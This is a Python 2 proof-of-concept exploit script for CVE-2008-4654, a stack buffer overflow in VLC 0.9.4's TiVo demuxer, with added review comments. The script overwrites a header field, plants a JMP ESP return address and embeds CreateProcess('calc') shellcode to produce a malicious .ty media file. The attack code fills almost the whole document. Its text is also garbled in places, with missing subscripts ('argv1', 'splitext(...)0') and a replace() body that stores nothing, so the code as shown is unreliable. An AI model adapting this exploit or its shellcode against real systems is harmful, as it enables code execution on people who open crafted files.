
CVE-2008-4654 VLC Media Player 0.9.0 through 0.9.4 缓冲区溢出漏洞


#!/usr/bin/python
#
# VLC 0.9.4 Stack-based Buffer Overflow exploit while demuxing
# the TiVo file format, as described by Tobias Klein in his advisory
# 	http://www.trapkit.de/advisories/TKADV2008-010.txt	
# CVE-2008-4654
#
# Shellcode has no bad-character requirements,
# but must be at most 187 bytes long.
#
# Exploit by Mariusz B.
#

import struct
import sys
import os

# 0x68f0cfad : jmp esp 
# {PAGE_EXECUTE_READ} libqt4_plugin.dll ASLR: False, Rebase: False, SafeSEH: False, OS: False
# Hard-coded absolute address that main() writes into the header (step 2).
# Because it is a fixed module address, the PoC is tied to the exact build
# quoted above; a relocated or ASLR-enabled build would not match.
RETURN_ADDRESS = 0x68f0cfad

# Four-byte magic that opens a TiVo stream header.  main() locates the header
# by searching the file for the big-endian encoding of this value.
TIVO_MAGIC = 0xf5467abd

# Aligns ESP stack pointer
# push    esp
# pop     eax
# sub     ax, 0x180
# mov     esp, eax
# Eight raw bytes; main() places them immediately in front of SHELLCODE
# (step 3).  Note the literal is a str (Python 2 byte string), as is SHELLCODE.
STACK_ALIGN = "\x54\x58\x66\x2d\x80\x01\x8b\xe0"


#
# Shellcode to be used - no bad chars.
# It must be at most 187 characters long!
#
# Below: 112 bytes long CreateProcess("calc")
# 	source: https://packetstormsecurity.com/files/102847/All-Windows-Null-Free-CreateProcessA-Calc-Shellcode.html
#
# NOTE(review): the bytes are reproduced verbatim from the cited source and
# are not decoded or length-checked anywhere in this script -- main() only
# prints len(SHELLCODE) -- so the 187-byte limit is the author's claim, not
# something the code enforces.
#
SHELLCODE =  (
	"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f"
	"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
	"\x77\x20\x8b\x3f\x80\x7e\x0c\x33"
	"\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
	"\x57\x78\x01\xc2\x8b\x7a\x20\x01"
	"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
	"\x45\x81\x3e\x43\x72\x65\x61\x75"
	"\xf2\x81\x7e\x08\x6f\x63\x65\x73"
	"\x75\xe9\x8b\x7a\x24\x01\xc7\x66"
	"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
	"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9"
	"\xb1\xff\x53\xe2\xfd\x68\x63\x61"
	"\x6c\x63\x89\xe2\x52\x52\x53\x53"
	"\x53\x53\x53\x53\x52\x53\xff\xd7"
)


def replace(data, start, length, what):
	"""Overlay the bytes of *what* onto *data* beginning at offset *start*.

	*length* caps how many offsets are visited; ``zip`` stops at the shorter
	of the offset range and *what*, so a *what* shorter than *length* writes
	only its own bytes and nothing is padded.  The (possibly modified)
	buffer is returned so callers can chain assignments.

	NOTE(review): as the page reproduces it, the loop body binds a plain
	local name and never stores into ``data``; the function as extracted is
	a no-op and returns its input unchanged.  The surrounding text shows
	other dropped subscripts (``argv1`` in main), so this looks like
	extraction damage rather than intent.
	"""
	for (n, r) in zip(range(start, start+length), list(what)):
		datan = r

	return data

def main(argv):
	"""Read the TiVo file named on the command line and write a patched copy.

	Steps, in order: load the whole file into a bytearray, find the TiVo
	header by its magic, call replace() for each patch region (i_map_size,
	return address, NOP bytes, STACK_ALIGN followed by SHELLCODE), then
	write the buffer to ``<input-without-extension>-exploit.ty``.

	Exits with status 1 when no argument is given or the magic is absent.

	NOTE(review): the page text is garbled -- ``argv1`` is not a defined
	name and the ``splitext(...)0`` line is not valid Python -- so, as
	extracted, this raises NameError before opening any file.  The code is
	Python 2 throughout (print statements; struct.pack() result wrapped in
	str(), which is a no-op on Python 2 byte strings).
	"""
	if len(argv) == 1:
		print 'Usag: vlc-exploit.py <tivo-file>'
		sys.exit(1)

	data = bytearray()
	with open(argv1, 'rb') as f:
		data = bytearray(f.read())

	# The magic is stored big-endian in the file, hence '>I' here.
	# find() returns the offset of the first match; every patch below is
	# relative to that offset.
	pos = data.find(str(struct.pack('>I', TIVO_MAGIC)))
	if pos == -1:
		print '! Not a valid TiVo file.'
		sys.exit(1)

	print '. Got a valid TiVo file.'

	# Step 1: Replace TiVo's i_map_size variable in order to trigger out of bounds read.
	# Mitigation side: the fix belongs in the demuxer -- bounding i_map_size
	# against the data actually present before using it -- not in the file;
	# the page title lists 0.9.0 through 0.9.4 as affected.
	data = replace(data, pos + 20, 4, struct.pack('>I', 0xff))

	# Step 2: Prepare a return address as a JMP ESP
	# Little-endian here ('<I'), unlike the header field above, because this
	# value is consumed as an x86 pointer rather than as a TiVo header field.
	data = replace(data, pos + 0x5c, 4, struct.pack('<I', RETURN_ADDRESS))
	data = replace(data, pos + 0x60, 4, '\x90' * 4)
	#data = replace(data, pos + 0x60, 4, '\xcc' + '\x90' * 3)	# DEBUG the shellcode

	# Step 3: Insert a shellcode
	# The 187-byte limit from the header comment is not enforced; only the
	# length is printed.
	print '+ Writing {} bytes long shellcode...'.format(len(SHELLCODE))
	data = replace(data, pos + 0x64, len(STACK_ALIGN), STACK_ALIGN)
	data = replace(data, pos + 0x64 + len(STACK_ALIGN), len(SHELLCODE), SHELLCODE)

	print '+ Exploit prepared.'

	# NOTE(review): splitext()[0] already carries the directory part of the
	# input path, so join()-ing it onto dirname() again presumably duplicates
	# the directory whenever argv[1] is not a bare filename -- confirm.
	new_file = os.path.join(os.path.dirname(argv1), os.path.splitext(argv1)0 + '-exploit.ty')
	with open(new_file, 'wb') as f:
		f.write(data)

	print '+ Prepared file: "{}"'.format(new_file)

# Script entry point: the full argv list is handed to main(), which reads
# the input path from index 1.
if __name__ == '__main__':
	main(sys.argv)
